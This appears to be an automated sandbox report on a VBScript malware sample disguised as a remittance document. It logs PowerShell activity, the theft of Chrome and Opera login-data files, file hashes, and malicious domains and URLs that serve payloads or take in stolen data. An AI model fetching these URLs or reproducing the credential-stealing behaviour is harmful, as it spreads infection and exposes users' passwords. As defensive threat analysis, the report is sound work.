Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
108.175.14.116	www.dentalbatonrouge.com	United States		8560	ONEANDONE-ASBrauerstrasse48DE	true
151.106.117.33	bulkwhatsappsender.in	Germany		61157	PLUSSERVER-ASN1DE	true

Name	Malicious	Antivirus Detection	Reputation
http://www.dentalbatonrouge.com/k6sm/	true	Avira URL Cloud: safe	unknown
https://www.bulkwhatsappsender.in/bin_FlDFmmV154.bin1	true	Avira URL Cloud: safe	unknown
1,0,350726710,000000A51B2F5000,00000104,00000010,00020000,00000000,1,0	true		low
www.usyeslogistics.com/k6sm/	true	Avira URL Cloud: safe	low
https://www.bulkwhatsappsender.in/bin_FlDFmmV154.bin	true	Avira URL Cloud: safe	unknown
http://www.dentalbatonrouge.com/k6sm/?d48pAVX=VId1XGgV51+banGxzL0dUPYEUmU95ttpJOMZNiN8gg3/S9FPXBDAGWpY0ehao+dqxo0M4PI93Q==&8pnDfl=Lb3tdB30pX2	true	Avira URL Cloud: safe	unknown

ID:	558870
Product:	CloudBasic
Start time:	15:44:07
Start date:	24.01.2022
Sample:	Remittance Information (MT-103).vbs
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	d693624e3d9614a0dc9cf5a5cd1bb8ef
SHA1:	9c50c26e8b2f9c9acfa3192385df88d3144f351c
SHA256:	dcc73a1351b6b79d48f7b42a96edfb142ffe46f896e1ab9f412a615b1edd7c9b
Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	937C6E940577634844311E349BD4614D	379440E933201CD3E6E6BF9B0E61B7663693195F	30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.0.cs	UTF-8 Unicode (with BOM) text, with CRLF line terminators	91A53AC70B74CB2F13A7305275F725B5	6662D631A3DE88D58188879EFA65950459EFE634	49F330CCA2ACCDE02359A71979219E1080B8A98E1DB6A47E8BD60430E583AFFE
C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	A3255BE19ED555ACC19FEDF01294E04C	94B5331A032C2CA252FC325DE0EFFA1F3CD43F1E	CAC7EB5E033387E7B415F375DECA89E90ECEA005F06D5F7BBB98FD32172D2C90
C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	68363D632D5C0C20E270FB06F3FB1D39	7F1A54BDC12C3D29B4E5A77199E3498F87BABBB6	08896AB4878BBA442762A29E884F4D0B27D3A1DAC8A69717767FABF0142AB8F5
C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.out	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators	B251BE8754B27BD87A0527F33DAED82E	0D8C66F11BCF1CFCF7D179D203DB62160D8E6BDD	38C5BFACB14A0D74C03871EB0B5391152E20DC6A3151C303E938CCEDFF0CBFCC
C:\Users\user\AppData\Local\Temp\5wwhq3bl\CSCEED551C9B69E4D3BACB27851B833AAE.TMP	MSVC .res	26227DB2BA5D86E5B698ACB313D7665B	DE52861CFE85D549E997EF021D4FEB31F1032997	B7096C918F6C1D4EB51C29C679587F73DE745CFD1FACB9752B6D1A8B1BC80C02
C:\Users\user\AppData\Local\Temp\Champag6.dat	data	E6C81D4CD250CD041F12F926AE2C4A57	619F23B7E24D5337C3003A2D0F831483D30981CA	0EC7EB748AF7B6B2337468C11AAE5061B5CDE0FF89472539B970AD57D739350A
C:\Users\user\AppData\Local\Temp\DB1	SQLite 3.x database, last written using SQLite version 3032001	81DB1710BB13DA3343FC0DF9F00BE49F	9B1F17E936D28684FFDFA962340C8872512270BB	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
C:\Users\user\AppData\Local\Temp\RES4377.tmp	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols	FF80A5DA283C4EA407A85AEBC4B2C080	B09FE79EB4E29E879ECBEDE48A5B3B7E9D32804C	62CC0D24D893E96FA9EEFBF89A41BC01CC595CC6F820EBC1DE5A97B3C4D199B5
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jebmlly.2vw.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jcpbiel0.fg2.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Roaming\K-NBS4VB\K-Nlogim.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3	6E26A569A41BD8DA75AF5D77EBF65F9A	B7D087B2414DE96183EF16A5C3D3F290CF05F135	09FB51AB270489B485CDCFA33C63F860C22EB16FBE2CEAA5D019C2540C884889
C:\Users\user\AppData\Roaming\K-NBS4VB\K-Nlogrg.ini	data	4AADF49FED30E4C9B3FE4A3DD6445EBE	1E332822167C6F351B99615EADA2C30A538FF037	75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
C:\Users\user\AppData\Roaming\K-NBS4VB\K-Nlogri.ini	data	D63A82E5D81E02E399090AF26DB0B9CB	91D0014C8F54743BBA141FD60C9D963F869D76C9	EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
C:\Users\user\AppData\Roaming\K-NBS4VB\K-Nlogrv.ini	data	A2EFAEE8C676F08EC79B084C7934D4B7	4668B7AB8A68C94E0D46C08AC85122D0F0045B25	FC319E560DD8A2254CEE9E666E558EC921F732907AB7BC3C606B426E28B3094F
C:\Users\user\Documents\20220124\PowerShell_transcript.284992.XtWh3q5P.20220124154518.txt	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators	3BE93613741C284F9F4DA58A4ADB9EDF	49BFD0ABCDC4504A24F5BD7B69460DD61DED1154	108E72C5D15B0FFACF3EFA681C311E811F04ACCC06092DB6BAD3CD27098AC47C